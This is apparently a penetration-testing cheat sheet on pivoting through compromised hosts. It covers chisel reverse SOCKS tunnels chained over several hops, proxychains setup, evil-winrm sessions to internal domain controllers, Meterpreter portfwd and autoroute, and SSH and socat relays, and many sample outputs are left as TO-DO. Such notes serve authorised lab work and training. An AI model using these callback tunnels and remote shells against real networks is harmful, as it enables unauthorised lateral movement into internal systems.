Basic
# Start a local chisel server. With --reverse it listens on all interfaces (note 0.0.0.0 in the output) and, as written, accepts any client, so anyone who can reach port 8000 can open reverse tunnels onto this machine. Add --auth user:pass here (and the same --auth on every client) and have clients pin the printed Fingerprint with --fingerprint.
./chisel server --reverse --port 8000
Sample Output:
$ ./chisel server --reverse --port 8000
2024/09/23 12:27:03 server: Reverse tunnelling enabled
2024/09/23 12:27:03 server: Fingerprint ikFn6iQOOodxIlcDQI4dvFu1pdHgV5UnHRenxUg0eho=
2024/09/23 12:27:03 server: Listening on http://0.0.0.0:8000
Port forwarding
# In target machine. The R: remote is bound on the chisel server side (our machine), on 127.0.0.1:<TARGET_PORT>, and relayed to 127.0.0.1:<TARGET_PORT> on the target.
./chisel client <LOCAL_IP>:8000 R:<TARGET_PORT>:127.0.0.1:<TARGET_PORT>
Sample Output:
TO-DO
# Multiple port forwards; they can point at different targets reachable from the client's subnet
./chisel client <LOCAL_IP>:8000 R:8080:172.17.0.2:8080 R:5000:172.17.0.3:5000
Sample Output:
TO-DO
Socks5
# In target machine
./chisel client <LOCAL_IP>:8000 R:1081:socks
Sample Output:
$ ./chisel client 10.10.14.31:8000 R:1081:socks
2024/09/23 04:16:44 client: Connecting to ws://10.10.14.31:8000
2024/09/23 04:16:44 client: Connected (Latency 47.945673ms)
# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO
# Add to the end of the file
socks5 127.0.0.1 1081
Sample Output:
TO-DO
# Example, in our local machine. Replace 172.16.1.100:1081 with the internal host and service port you want to reach through the tunnel; 1081 is only the local SOCKS listener configured above, not a port on the target.
proxychains4 curl http://172.16.1.100:1081
Sample Output:
TO-DO
Ref: chisel
Multiple subnets
1. Local Kali
./chisel server --reverse --socks5 --port 8000
Sample Output:
TO-DO
2. Hop 1
# Start a client
./chisel client <LOCAL_IP>:8000 R:1081:socks &
Sample Output:
TO-DO
# Start a server
./chisel server --reverse --socks5 --port 8001 &
Sample Output:
TO-DO
# Start a client
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe client <LOCAL_IP>:8000 R:1081:socks }
Sample Output:
TO-DO
# Start a server
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe server --reverse --socks5 --port 8001 }
Sample Output:
TO-DO
# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO
# Add to the end of the file
socks5 127.0.0.1 1081
Sample Output:
TO-DO
3. Hop 2
# Start a client
./chisel client <HOP_1_IP>:8001 R:1082:socks &
Sample Output:
TO-DO
# Start a server
./chisel server --reverse --socks5 --port 8002 &
Sample Output:
TO-DO
# Start a client
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe client <HOP_1_IP>:8001 R:1082:socks }
Sample Output:
TO-DO
# Start a server
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe server --reverse --socks5 --port 8002 }
Sample Output:
TO-DO
# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO
# Append below the existing 1081 entry and keep it: Hop 2's R:1082:socks listener is bound on Hop 1's loopback, so in strict_chain mode proxychains must go through 127.0.0.1:1081 first to reach 127.0.0.1:1082.
socks5 127.0.0.1 1082
Sample Output:
TO-DO
4. Hop 3
# Start a client
./chisel client <HOP_2_IP>:8002 R:1083:socks &
Sample Output:
TO-DO
# Start a server
./chisel server --reverse --socks5 --port 8003 &
Sample Output:
TO-DO
# Start a client
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe client <HOP_2_IP>:8002 R:1083:socks }
Sample Output:
TO-DO
# Start a server
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe server --reverse --socks5 --port 8003 }
Sample Output:
TO-DO
# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO
# Append below the existing 1081 and 1082 entries and keep them: Hop 3's R:1083:socks listener is bound on Hop 2's loopback, so proxychains has to traverse the earlier hops in order to reach 127.0.0.1:1083.
socks5 127.0.0.1 1083
Sample Output:
TO-DO
Note: Follow the same pattern for more layers
Example
Local Kali WEB01 LINUX DC01 Windows DC02 Windows <-- TARGET
+------------+ +---------------+ +---------------+ +---------------+
| 10.10.14.1 | | 10.10.110.100 | | 172.16.1.20 | | 172.16.2.5 |
| | --> | | --> | | --> | |
| | | 172.16.1.100 | | 172.16.2.20 | | |
+------------+ +---------------+ +---------------+ +---------------+
Sample Output:
TO-DO
1. Local Kali
./chisel server --reverse --socks5 --port 8000
Sample Output:
$ ./chisel server --reverse --socks5 --port 8000
2024/09/29 14:25:33 server: Reverse tunnelling enabled
2024/09/29 14:25:33 server: Fingerprint QFsVZapiOv/hBAKLzj+645y42Sra4IV/Le7G/wgZ4/Y=
2024/09/29 14:25:33 server: Listening on http://0.0.0.0:8000
2024/09/29 14:25:40 server: session#1: tun: proxy#R:127.0.0.1:1081=>socks: Listening
2. WEB01 Linux (Gateway 1)
# Start a client
./chisel client 10.10.14.1:8000 R:1081:socks &
Sample Output:
root@WEB01:/dev/shm# ./chisel client 10.10.14.1:8000 R:1081:socks
2024/09/28 23:31:23 client: Connecting to ws://10.10.14.1:8000
2024/09/28 23:31:26 client: Connected (Latency 312.250392ms)
# Start a server
./chisel server --reverse --socks5 --port 8001 &
Sample Output:
root@WEB01:/dev/shm# ./chisel server --reverse --socks5 --port 8001
2024/09/28 22:54:18 server: Fingerprint BsVmahG6oWbFa26XG4DC8tPiL9nFq2zF3N8jUG5Edwk=
2024/09/28 22:54:18 server: Listening on http://0.0.0.0:8001
2024/09/28 22:56:07 server: session#1: tun: proxy#R:127.0.0.1:1082=>socks: Listening
3. DC01 Windows (Gateway 2)
# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO
# Add to the end of the file
socks5 127.0.0.1 1081
Sample Output:
TO-DO
proxychains4 evil-winrm -i 172.16.1.20 -u user -p password
Sample Output:
$ proxychains4 evil-winrm -i 172.16.1.20 -u user -p password
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:1081 ... 172.16.1.20:5985 ... OK
*Evil-WinRM* PS C:\Users\user\Documents>
.\chisel.exe client 172.16.1.100:8001 R:1082:socks
Sample Output:
*Evil-WinRM* PS C:\Users\user\Documents>.\chisel.exe client 172.16.1.100:8001 R:1082:socks
2024/09/29 07:41:35 client: Connecting to ws://172.16.1.100:8001
2024/09/29 07:41:35 client: Connected (Latency 0s)
# Or run in background
Start-Job -ScriptBlock { C:\ProgramData\chisel.exe client 172.16.1.100:8001 R:1082:socks }
Sample Output:
TO-DO
4. Local Kali
# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO
# Append below the existing 1081 entry and keep it: the 1082 listener lives on WEB01's loopback (see "proxy#R:127.0.0.1:1082=>socks" above), so proxychains must chain 127.0.0.1:1081 then 127.0.0.1:1082, as the "Strict chain" line in the output below shows.
socks5 127.0.0.1 1082
Sample Output:
TO-DO
proxychains4 evil-winrm -i 172.16.2.5 -u user -p password
Sample Output:
$ proxychains4 evil-winrm -i 172.16.2.5 -u user -p password
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:1081 ... 127.0.0.1:1082 ... 172.16.2.5:5985 ... OK
*Evil-WinRM* PS C:\Users\user\Documents>
Note: Edit /etc/proxychains4.conf according to the layer you are accessing: the socks5 entries are traversed in order in strict_chain mode, so keep every earlier hop's entry and append the new one at the end.
Port forwarding
# Add. The relay binds on all local interfaces unless a host is given (note the empty host in "(local) :88" below); pass -L 127.0.0.1 to keep it loopback-only.
portfwd add -l <TARGET_PORT> -r <TARGET> -p <TARGET_PORT>
Sample Output:
meterpreter > portfwd add -l 88 -r 172.16.2.5 -p 88
[*] Forward TCP relay created: (local) :88 -> (remote) 172.16.2.5:88
# Delete
portfwd delete -l <TARGET_PORT> -r <TARGET> -p <TARGET_PORT>
Sample Output:
TO-DO
Add routes
# Enter target session
sessions <SESSION_ID>
Sample Output:
msf6 post(multi/manage/autoroute) > sessions 1
[*] Starting interaction with 1...
# Return from meterpreter
background
Sample Output:
meterpreter > background
[*] Backgrounding session 1...
use post/multi/manage/autoroute
Sample Output:
msf6 exploit(multi/handler) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) >
set session <SESSION_ID>
Sample Output:
msf6 post(multi/manage/autoroute) > set session 1
session => 1
# Manual add [optional]
set cmd add
Sample Output:
msf6 post(multi/manage/autoroute) > set cmd add
cmd => add
# Manual set subnet [optional]
set subnet <SUBNET>
Sample Output:
msf6 post(multi/manage/autoroute) > set subnet 172.16.1.0
subnet => 172.16.1.0
# Manual set mask [optional]
set netmask <MASK>
Sample Output:
msf6 post(multi/manage/autoroute) > set netmask 255.255.255.0
netmask => 255.255.255.0
run
Sample Output:
msf6 post(multi/manage/autoroute) > run
[*] Running module against 172.16.1.100
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.16.1.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
# Manual add route
route add <SUBNET> <MASK> <SESSION_ID>
Sample Output:
TO-DO
# Check
route
Sample Output:
msf6 post(multi/manage/autoroute) > route
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
172.16.1.0 255.255.255.0 Session 2
172.16.2.0 255.255.255.0 Session 1
# Check route to target
route get <TARGET>
Sample Output:
msf6 auxiliary(server/socks_proxy) > route get 172.16.2.1
172.16.2.1 routes through: Session 1
# Remove route
route remove <SUBNET>/<MASK> <SESSION_ID>
Sample Output:
TO-DO
# Remove all routes
route flush
Sample Output:
TO-DO
Socks5
use auxiliary/server/socks_proxy
Sample Output:
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) >
# Set socks port [optional]. Also set SRVHOST 127.0.0.1 unless other hosts really need to reach the proxy, so the pivot is not exposed on every interface.
set SRVPORT <SOCKS_PORT>
Sample Output:
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1081
SRVPORT => 1081
run
Sample Output:
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server <----- Press Enter
# In our local Linux machine
sudo nano /etc/proxychains4.conf
Sample Output:
TO-DO
# Add to the end of the file
socks5 127.0.0.1 <SOCKS_PORT>
Sample Output:
TO-DO
# Example, in our local machine. Replace 172.16.1.100:1081 with the internal host and service port you want to reach; 1081 here is only the local SOCKS listener port, not a port on the target.
proxychains4 curl http://172.16.1.100:1081
Sample Output:
TO-DO
# SSH port forwarding without spawning a shell. Passing the password with sshpass -p exposes it in the process list and shell history; prefer key auth (-i, as in the SOCKS sample below) or export SSHPASS and use sshpass -e.
sshpass -p '<PASSWORD>' ssh -N -L <TARGET_PORT>:127.0.0.1:<TARGET_PORT> <USER>@<TARGET>
Sample Output:
$ ssh -N -L 5985:127.0.0.1:5985 3v4Si0N@10.10.10.240
3v4Si0N@10.10.10.240's password:
# SSH SOCKS5 tunneling without spawning a shell (the -D listener binds on localhost; prefer key auth as in the sample, or sshpass -e with SSHPASS set, over a password on the command line)
sshpass -p '<PASSWORD>' ssh -N -D 1081 <USER>@<TARGET>
Sample Output:
$ ssh -i id_rsa -N -D 1081 root@10.10.11.179
# Any traffic that reaches port <TARGET_PORT> on this host (listening on all interfaces) is forwarded to <LOCAL_IP>:<TARGET_PORT>; add reuseaddr to the listen side if the relay has to be restarted quickly
./socat tcp-listen:<TARGET_PORT>,fork tcp:<LOCAL_IP>:<TARGET_PORT> &
Sample Output:
TO-DO
socks5 start
Sample Output:
TO-DO